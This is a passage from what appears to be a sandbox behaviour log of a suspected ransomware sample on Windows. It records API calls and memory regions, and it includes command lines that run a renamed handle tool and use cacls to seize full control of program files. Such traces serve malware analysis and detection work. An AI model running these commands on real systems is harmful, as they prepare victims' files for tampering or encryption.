_wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0290.728] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0290.728] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0290.728] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0290.728] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0290.728] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0290.728] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0290.728] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0290.728] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0290.728] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0290.728] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0290.728] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0290.728] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0290.728] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0290.728] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0290.728] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0290.728] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0290.728] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0290.728] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0290.728] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0290.728] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0290.728] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0290.728] lstrcmpW (lpString1="\\vIDhS3md.exe", lpString2="\\XCOPY.EXE") returned -1 [0290.729] CreateProcessW (in: lpApplicationName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe", lpCommandLine="vIDhS3md.exe -accepteula \"Workflow.Targets\" -nobanner", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0xbaf5f0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vIDhS3md.exe -accepteula \"Workflow.Targets\" -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xbaf63c | out: lpCommandLine="vIDhS3md.exe -accepteula \"Workflow.Targets\" -nobanner", lpProcessInformation=0xbaf63c*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x6b4, dwThreadId=0xfec)) returned 1 [0290.737] CloseHandle (hObject=0xa4) returned 1 [0290.737] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0290.737] GetEnvironmentStringsW () returned 0xc18288* [0290.737] FreeEnvironmentStringsA (penv="=") returned 1 [0290.737] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0291.802] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0xbaf5d4 | out: lpExitCode=0xbaf5d4*=0x1) returned 1 [0291.802] CloseHandle (hObject=0xa8) returned 1 [0291.802] _vsnwprintf (in: _Buffer=0xbaf6bc, _BufferCount=0x13, _Format="%08X", _ArgList=0xbaf5dc | out: _Buffer="00000001") returned 8 [0291.802] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0291.802] GetEnvironmentStringsW () returned 0xc18288* [0291.802] FreeEnvironmentStringsA (penv="=") returned 1 [0291.802] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0291.802] GetEnvironmentStringsW () returned 0xc18288* [0291.802] FreeEnvironmentStringsA (penv="=") returned 1 [0291.802] DeleteProcThreadAttributeList (in: lpAttributeList=0xbaf668 | out: lpAttributeList=0xbaf668) [0291.802] _get_osfhandle (_FileHandle=1) returned 0xc0 [0291.802] SetConsoleMode (hConsoleHandle=0xc0, dwMode=0x0) returned 0 [0291.802] _get_osfhandle (_FileHandle=1) returned 0xc0 [0291.803] GetConsoleMode (in: hConsoleHandle=0xc0, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 0 [0291.803] _get_osfhandle (_FileHandle=0) returned 0x38 [0291.803] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0291.890] SetConsoleInputExeNameW () returned 0x1 [0291.890] GetConsoleOutputCP () returned 0x1b5 [0291.890] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0291.890] SetThreadUILanguage (LangId=0x0) returned 0x409 [0291.891] exit (_Code=1) Thread: id = 956 os_tid = 0xe3c Process: id = "129" image_name = "cacls.exe" filename = "c:\\windows\\syswow64\\cacls.exe" page_root = "0x7a6a6000" os_pid = "0xfbc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "118" os_parent_pid = "0x5c0" cmd_line = "cacls \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\" /E /G CIiHmnxMn6Ps:F /C" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9114 start_va = 0x530000 end_va = 0x54ffff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 9115 start_va = 0x550000 end_va = 0x551fff entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 9116 start_va = 0x560000 end_va = 0x573fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 9117 start_va = 0x580000 end_va = 0x5bffff entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 9118 start_va = 0x5c0000 end_va = 0x5fffff entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 9119 start_va = 0x600000 end_va = 0x603fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 9120 start_va = 0xd70000 end_va = 0xd79fff entry_point = 0xd70000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\SysWOW64\\cacls.exe" (normalized: "c:\\windows\\syswow64\\cacls.exe") Region: id = 9121 start_va = 0xd80000 end_va = 0x4d7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d80000" filename = "" Region: id = 9122 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 9123 start_va = 0x7eef0000 end_va = 0x7ef12fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eef0000" filename = "" Region: id = 9124 start_va = 0x7ef14000 end_va = 0x7ef14fff entry_point = 0x0 region_type = private name = "private_0x000000007ef14000" filename = "" Region: id = 9125 start_va = 0x7ef1a000 end_va = 0x7ef1afff entry_point = 0x0 region_type = private name = "private_0x000000007ef1a000" filename = "" Region: id = 9126 start_va = 0x7ef1d000 end_va = 0x7ef1ffff entry_point = 0x0 region_type = private name = "private_0x000000007ef1d000" filename = "" Region: id = 9127 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9128 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 9129 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 9130 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9131 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 9132 start_va = 0x610000 end_va = 0x610fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9133 start_va = 0x620000 end_va = 0x621fff entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 9153 start_va = 0x6e0000 end_va = 0x6effff entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 9154 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 9155 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 9156 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 9157 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 9158 start_va = 0x6f0000 end_va = 0x96ffff entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 9159 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 9160 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 9161 start_va = 0x530000 end_va = 0x53ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9162 start_va = 0x7edf0000 end_va = 0x7eeeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007edf0000" filename = "" Region: id = 9173 start_va = 0x6f0000 end_va = 0x7adfff entry_point = 0x6f0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9174 start_va = 0x870000 end_va = 0x96ffff entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 9175 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 9176 start_va = 0x630000 end_va = 0x66ffff entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 9177 start_va = 0x670000 end_va = 0x6affff entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 9178 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 9179 start_va = 0x7ef17000 end_va = 0x7ef19fff entry_point = 0x0 region_type = private name = "private_0x000000007ef17000" filename = "" Region: id = 9180 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 9181 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 9182 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 9183 start_va = 0x540000 end_va = 0x543fff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 9184 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 9185 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 9186 start_va = 0x74650000 end_va = 0x74677fff entry_point = 0x74650000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 9187 start_va = 0x970000 end_va = 0xadffff entry_point = 0x0 region_type = private name = "private_0x0000000000970000" filename = "" Region: id = 9188 start_va = 0x550000 end_va = 0x553fff entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 9225 start_va = 0x4d80000 end_va = 0x50b6fff entry_point = 0x4d80000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 9226 start_va = 0x6b0000 end_va = 0x6b1fff entry_point = 0x6b0000 region_type = mapped_file name = "cacls.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\cacls.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\cacls.exe.mui") Thread: id = 959 os_tid = 0x70c Thread: id = 961 os_tid = 0x82c Process: id = "130" image_name = "vidhs3md.exe" filename = "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe" page_root = "0x42e6e000" os_pid = "0x6b4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "128" os_parent_pid = "0x3f0" cmd_line = "vIDhS3md.exe -accepteula \"Workflow.Targets\" -nobanner" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9135 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 9136 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 9137 start_va = 0x40000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 9138 start_va = 0x60000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 9139 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 9140 start_va = 0x1a0000 end_va = 0x1a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 9141 start_va = 0x400000 end_va = 0x476fff entry_point = 0x400000 region_type = mapped_file name = "vidhs3md.exe" filename = "\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe") Region: id = 9142 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 9143 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 9144 start_va = 0x7ffdb000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 9145 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 9146 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 9147 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9148 start_va = 0x7fff0000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 9149 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9150 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 9151 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9152 start_va = 0x1c0000 end_va = 0x1c1fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 9163 start_va = 0x2e0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 9164 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 9165 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 9166 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 9167 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 9168 start_va = 0x480000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 9169 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 9170 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 9171 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 9172 start_va = 0x7feb0000 end_va = 0x7ffaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 9189 start_va = 0x1d0000 end_va = 0x28dfff entry_point = 0x1d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9190 start_va = 0x20000 end_va = 0x23fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 9191 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 9192 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 9193 start_va = 0x290000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 9194 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 9195 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 9196 start_va = 0x7ffd8000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 9197 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 9198 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 9199 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 9200 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 9201 start_va = 0x74eb0000 end_va = 0x74f6dfff entry_point = 0x74eb0000 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\SysWOW64\\comdlg32.dll" (normalized: "c:\\windows\\syswow64\\comdlg32.dll") Region: id = 9202 start_va = 0x74f70000 end_va = 0x75129fff entry_point = 0x74f70000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 9203 start_va = 0x771d0000 end_va = 0x7725cfff entry_point = 0x771d0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 9204 start_va = 0x74ad0000 end_va = 0x74c0ffff entry_point = 0x74ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 9205 start_va = 0x77370000 end_va = 0x774bcfff entry_point = 0x77370000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 9206 start_va = 0x74c10000 end_va = 0x74c53fff entry_point = 0x74c10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 9207 start_va = 0x752c0000 end_va = 0x7667efff entry_point = 0x752c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 9208 start_va = 0x76800000 end_va = 0x76cdcfff entry_point = 0x76800000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 9209 start_va = 0x752b0000 end_va = 0x752bbfff entry_point = 0x752b0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 9210 start_va = 0x74ce0000 end_va = 0x74d23fff entry_point = 0x74ce0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 9211 start_va = 0x77100000 end_va = 0x7710efff entry_point = 0x77100000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 9212 start_va = 0x743b0000 end_va = 0x74441fff entry_point = 0x743b0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_49c02355cf03478c\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_49c02355cf03478c\\comctl32.dll") Region: id = 9213 start_va = 0x745d0000 end_va = 0x745d7fff entry_point = 0x745d0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 9214 start_va = 0x5a0000 end_va = 0x62ffff entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 9215 start_va = 0x5a0000 end_va = 0x5c9fff entry_point = 0x5a0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 9216 start_va = 0x620000 end_va = 0x62ffff entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 9217 start_va = 0x630000 end_va = 0x7b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 9218 start_va = 0x75220000 end_va = 0x7524afff entry_point = 0x75220000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 9219 start_va = 0x76da0000 end_va = 0x76ebffff entry_point = 0x76da0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 9220 start_va = 0x7c0000 end_va = 0x940fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007c0000" filename = "" Region: id = 9221 start_va = 0x950000 end_va = 0x1d4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000950000" filename = "" Region: id = 9222 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 9223 start_va = 0x2d0000 end_va = 0x2d0fff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 9224 start_va = 0x1d50000 end_va = 0x1e7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d50000" filename = "" Thread: id = 960 os_tid = 0xfec [0291.241] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x75130000 [0291.241] GetProcAddress (hModule=0x75130000, lpProcName="SetEvent") returned 0x751560c0 [0291.241] GetProcAddress (hModule=0x75130000, lpProcName="WaitForSingleObject") returned 0x75156110 [0291.241] GetProcAddress (hModule=0x75130000, lpProcName="DeviceIoControl") returned 0x751487e0 [0291.241] GetProcAddress (hModule=0x75130000, lpProcName="DuplicateHandle") returned 0x75155f30 [0291.241] GetProcAddress (hModule=0x75130000, lpProcName="FormatMessageW") returned 0x75154a40 [0291.241] GetProcAddress (hModule=0x75130000, lpProcName="CreateEventW") returned 0x75155fa0 [0291.241] GetProcAddress 